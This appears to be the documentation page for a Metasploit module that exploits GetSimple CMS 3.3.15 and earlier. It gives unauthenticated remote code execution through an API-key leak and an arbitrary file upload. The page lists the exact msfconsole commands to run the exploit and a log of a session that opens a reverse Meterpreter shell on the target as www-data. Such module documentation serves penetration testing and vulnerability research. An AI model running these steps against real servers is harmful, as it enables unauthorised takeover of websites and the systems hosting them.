cgranleese-r7
1.6 KiB
1.6 KiB
Description
This module exploits a vulnerability found in GetSimpleCMS, which allows unauthenticated attackers to perform Remote Code Execution. An arbitrary file upload vulnerability can be triggered by an authenticated user, however authentication can be bypassed by leaking the cms API key to target the session manager.
Vulnerable Application
GetSimple CMS versions 3.3.15 and below
Vulnerable installations can be found here
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/getsimplecms_unauth_code_exec - Do:
set RHOSTS <IP> - Do:
run - You should get a shell.
Scenarios
Tested on GetSimple CMS v3.3.15 on Ubuntu 18.04
msf > use exploit/multi/http/getsimplecms_unauth_code_exec
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set rhosts 192.168.37.137
rhosts => 192.168.37.137
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set verbose true
verbose => true
msf exploit(multi/http/getsimplecms_unauth_code_exec) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] GetSimpleCMS version 3315
[*] Sending stage (38247 bytes) to 192.168.37.137
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.137:32976) at 2019-05-16 11:22:39 -0500
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : ubuntu
OS : Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64
Meterpreter : php/linux
meterpreter >